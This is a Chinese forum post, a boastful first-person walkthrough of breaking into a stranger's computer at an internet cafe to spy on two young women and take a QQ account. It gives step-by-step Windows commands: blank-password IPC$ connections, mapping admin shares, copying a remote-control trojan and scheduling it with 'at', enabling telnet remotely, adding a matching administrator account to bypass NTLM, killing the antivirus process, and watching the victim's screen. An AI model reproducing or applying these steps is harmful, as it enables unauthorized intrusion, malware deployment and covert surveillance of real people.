★我要吧★

 找回密码
 注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

[技术] 亲身体验如何盗取QQ号

[复制链接]
发表于 2016-3-5 10:16:00 | 显示全部楼层 |阅读模式
好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……
5 Y& f5 D2 o; @6 x
8 N5 N* }! r7 Y6 b  在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……! s- S% o1 K1 u! ?$ B
5 X+ T* z$ h! V! ~) T
  这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了…… 6 A8 r9 h4 ?1 ~/ p$ t
; O" v6 ~. n# y% U7 U* P( g
  无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..)
( g7 B! C. ]. J7 Y; a) F. S) k' a0 y2 m/ [; X
  打开偶可爱的CMD..先net name下看看本机情况
. h- g2 k7 z4 B( W$ r3 r% n) ]& g" g! v% v
  WANGLU05 5 I& _5 B, E8 m) ~/ L

! p; m$ b( {5 Q4 s+ `9 o  USER2000
$ h$ F) \0 I! N% {$ u# C* P
0 b% @3 }' |) [; ?* ~1 U8 y  命令成功完成。
# g2 ?& f* Q4 C7 h/ l* R
3 H! o2 v" u& Q0 a  我本机名是WANGLU05.ping下看看IP有无什么规则 * @, D0 K6 v% H: @* i. s5 a
2 `) M7 l, |3 f, p3 T
  Pinging wanglu05 [192.168.0.13] with 32 bytes of data: - j9 s1 H  r5 m) C; w1 o
* W7 x1 A8 F. {' `" ]
  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 " G& h3 R  l! d. f
2 \' Y' A+ ?0 f. |- o
  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 " _; ?) s8 Z0 t6 ~+ L) ~: _2 D

; @2 l9 u% M. q' O: m  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 5 o, \- _$ D1 G! h! L- l
$ \: f1 @  J1 Z) u+ @2 j
  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64
! L5 ?* `( D0 _! @% X0 P
. f. z& M0 g% _8 ?: A* h+ `  IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.
: E. q* i1 M* Q3 p4 h5 i& }* ^4 F
% u  o9 H8 m6 {# u  这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了. " i& x* I, x( w
/ U! O# l8 w; C6 K, d$ S1 u7 _
  Pinging WANGLU13 [192.168.0.225] with 32 bytes of data: $ X! A1 S2 R- ~  E- q- U  ?: e: [+ r$ c
/ V% M* D: W9 S
  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128 & `9 b. c! T/ v
0 d$ r' I9 U" P& t, w+ ]( O- G
  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128
4 A+ N& _! @1 |4 M3 Y
; \5 b  |, ?. h2 n( k" _. X  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128
0 _) r, l4 n8 C1 q/ x9 R$ ~8 \2 F8 S! G+ u' ~4 A4 [( l6 H
  得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....
! G, }+ |8 c' |- v" @5 w8 b% Y2 a, g1 t% N# Z
  net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在... / n& T  j0 F' H% ~2 }# R

6 I3 X4 E9 P- O  只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子. $ h3 b" f  m/ V+ k: V) v0 L; \! p

  {5 {" R$ D# e" Y0 o/ u2 R  G:/>net use //192.168.0.225/ipc$ "" /user:"user04" , f; I& }+ S" w+ x. H2 b  `

* X0 }4 v$ d# M9 w  命令成功完成。
6 }! x" r& S$ J6 C$ T/ O) X
, g. o( s! q; o8 H% K/ @- G

% r) c& _  V; M4 y如图1.
' P* B0 ?4 D7 s$ P$ e/ h网吧系统盘为G盘.接着映射对方G盘为我本地Z盘. , l  j$ U  }" l$ f

; T5 @0 E/ B" z+ B: D1 t8 |  G:/>net use z: //192.168.0.225/g$ & Z. ^+ I. y* ^2 F
# _  g8 y' P, \# B
  命令成功完成。
5 S% Q- Y/ X8 c8 K' h6 W
; {6 x. U( V# e

* _8 W; H0 V1 m' W- ^$ ?% d; u1 q如图22 _+ g/ G- i8 |

' z" N& Q  y' d3 q5 E+ `3 y  现在我的电脑里多了一个Z盘...图3. 4 n5 C- t: _8 ?- s' N, W* S

) u5 }) d8 R6 T! H% C* O3 a. {

  现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...

  这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....
: f0 \( V9 a/ n3 v1 b9 i: H6 M9 u% {' z9 {( O7 W. p. @+ ]* ^! q5 X# p6 L/ W
  下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个   P5 i% h+ p( z7 V

" F# f$ p& N* ~7 T7 m% e  k( e  web控制台.体积没多大,205KB..下面是关于webserver的介绍./../ + s* `% C7 f, N7 L. y

$ H! m/ |% _; i  web控制台
5 U# |4 N7 i- q6 g9 J& f3 i; [) ~" O: B" \/ z1 ^+ g
  一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。 用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。 . B, D) A4 a+ n4 p- {1 |

: v$ Q8 p, a* h' Y  可以在我网络盘里下到
4 J$ w6 J, m; k. r! l# {6 G3 }" n1 A% z+ }4 n  w( l
  & R% G; X2 b6 t4 n4 C
3 t* P" b& l+ e) i
  综合工具里有个 webserver.rar
6 {5 }1 y$ ^4 ]7 R5 |# X. U5 \
2 Z4 F# h" m8 T! X- w$ U* \  接着 " [8 V- W6 r  c) P% L6 {& |3 t

# W9 B& ?! Q8 x$ O. G7 {7 L  G:/>copy webserver.exe //192.168.0.225/admin$
# G) k: I) ?9 U, }, j# e& E" A7 |8 U9 p; ^7 W$ ^: \) F) a2 Q5 u
  已复制 1 个文件。
; a; S+ y, a" b- p9 O3 I2 a9 I+ C7 k6 L8 F! q7 S" I9 A" e% J% O
  G:/>net time //192.168.0.225
% v2 r1 ]$ }5 F: N/ M
4 J! I5 h. P9 q8 ^  //192.168.0.225 的当前时间是 2005/2/5 下午 05:00 % `) z* ?! _( t* g
) `! M1 T& D9 M/ X
  命令成功完成。 $ p1 a  d) l+ L

  E6 _2 d/ Y, O% t& T8 D7 A2 i5 F

6 S( E7 V- S8 y) z. M
图4

  G:/>at //192.168.0.225 17:02 webserver.exe

  用AT命令启动webserver.exe. 9 T) d7 y: S  r( c
- P% \% z- i' l' U  g
  2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...
( M/ D# n- j; e% F0 P6 W
0 ]* K9 p6 R. m) c5 M  FT....我说那. 2 @7 B1 I* ]3 }& T

' @: X  L4 e6 T  难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下.. 3 M. q+ _& e3 D9 O3 {

5 T/ A) B  |. O- Z' j! y& y5 d* \. O  还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...

  打开控制面板--管理工具--计算机管理
- H7 @9 H' A7 I  `1 q  d. O$ p) p
) B- C9 a/ m) W9 C- b6 u  操作-连接到另一计算机. " B" B5 M* k' P  E: z

8 A4 u) b2 R; g$ C% q  然后输入IP192.168.0.225
6 {- \" Q8 K- p! B* r+ y6 A; L: z! D7 H- L: I, h

; ^% }- _2 B% Z4 O% q. D
图5
0 N( k' |+ z0 f6 Q

  呵.等一会就可以看到成功了...你看到了什么? 0 T) D3 q' ]* e8 V# \4 o/ E

( f3 n# h0 r7 o2 S  更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.
7 y' T- O9 X. ^  s* r: @  m0 g


; b$ h( D5 A. \4 g% F5 m+ \

6 `; k9 ^! ~2 S7 X图6  OK了... $ w- V0 U% f; J7 ], u/ [, y" X" [
6 ~9 R- I0 {& k5 q
  本地打开一cmd ) J4 c# t: w3 f( \
0 w$ H* c8 t  |7 v3 F
  输入
% b. R2 F8 E( K, N2 o2 g" w) E0 V' b1 g" K* M
  G:/>telnet 192.168.0.225 3 I0 d) c3 M/ a. |' M( ~2 V
' Y  d( L; o! s+ t6 m/ A
  回车后出现 - W/ b( [2 |: G- d  B4 K; N. e
2 m/ i/ O& f* o# Y3 s2 n0 w% w
  Server allows NTLM authentication only 0 q$ f3 @* u7 |0 w! C+ l! K

& ~/ T. [' ~, }) X* \4 f" p  Server has closed connection
/ i- Y9 [- ]$ v8 D. N+ p" r
2 ]  Q: {/ y; R. D! N3 Y8 |
- c; u' ?6 _) O! |- ]  g
图7
5 Q. [  C  ]) O# ^$ _

  需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题. " I- g! J7 K) L3 Q

% l9 N# ?# y( F* V  X7 U  ntlm.exe在《流光》的Tools目录中有的...
' Z9 m5 ^  r7 e! F- w3 S; b0 t4 F5 T9 a( {' ?
  没工具怎么办呢..
) s3 \8 e- l; e9 u
3 v6 c- u1 v" ?3 f. Z  我们在本地添加一和远程主机同样的用户名 ) }) f7 a) A. v. l6 P1 q
' N( W. y, ?2 s1 r/ u
  输入
7 ^6 H# L; C, V! E/ q
$ ^9 w) U7 {& G( w* s  net user user04 /add 添加user04密码为空的用户
) t) u$ Q7 W3 @7 X( p) i* s
0 ~" l8 B9 t. T  net localgroup administrators user04 /add 把user04加入管理员组
; m! p, ?3 |8 z7 @0 ^& ]% x9 q1 W" U; Z' i
  然后来到G:/Winnt/system32下找到CMD.exe
) K) N; T9 z; b3 ?! e. T1 A
/ N5 J" y% U/ o8 I+ n  ]+ _  右击.创建快捷方式.然后在快捷方式 CMD右击..属性. ! ~5 c  U# }6 u; T, ?% T

, _$ L% v. J' D8 }) k  在以其他用户身份运行前打勾... 7 `% |( e6 p9 |5 Y& `0 n

. s& ?# {# U+ c  I& O, H/ z

# N, m! J5 H- o; c9 A% N" N. `3 @
图8然后运行
: g7 H! ?  L* ]$ a

  快捷方式 CMD
" ]! g% \$ S* @
% z+ L# E9 y+ Y& E# J3 _. B  弹出窗口.在用户名处输入user04密码为空 # {- F6 z4 @+ G3 c6 u6 e
* X$ m% \) M1 v' w% P2 I
  
. F" k7 d2 _/ G5 O8 j5 }/ J5 m

9 \. @3 o3 k0 z) A
图9

  然后
9 N1 c+ m: w+ z0 b) t; I
5 _& Y, w% C3 j9 ]- z' m  telnet 192.168.0.225
# ~0 W( }' e* t" L! K  f' @) {: a- {/ w5 X  |* |. l& `
  回车..哈哈...拿到shell了.... + h" t0 I6 {) n3 V

; m! n( i' I) H4 L  接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东 & |3 V& q, ~* B& N
' K7 \3 k8 B; `; C- _
  copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程
9 G7 V! M+ l6 G6 \5 C* t0 P( o/ O, M. I2 y
  这下把瑞星给关了.还怕他提示有毒 3 c% z) O4 f2 D3 l

% M. G. D( m- i5 D1 y7 \  接着执行webserver.exe
: h3 `5 R9 u3 V" v* J% Z9 H- h) S; j& J. j  M
  在IE里输入
+ j( J( C6 ^& w. E# N! M  r
8 A: B4 F" M- }% ^2 t1 ?5 C  N  192.168.0.225 0 G5 v3 Z+ R" N; ?% O! A* O/ r
4 q- k9 B$ v; `: f: t9 O

' v8 P  z4 a8 E! F# ?9 f
图101 L; T# w0 t" k

  看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天...
: m4 l; H* Y: `6 v; v, [' ?
: f) A. W5 V* x  u" r  好了她的QQ号码也拿到手了..加了她去聊聊去....


$ y* V  B5 R! Q9 v" D0 f* K
发表于 2021-9-2 14:50:42 | 显示全部楼层
图呢???????
回复 支持 反对

使用道具 举报

发表于 2021-9-2 17:26:39 | 显示全部楼层
反正听不懂  
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2021-9-11 21:25:27 | 显示全部楼层
看不太懂,不明觉厉
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2024-12-26 03:06 , Processed in 0.090071 second(s), 18 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表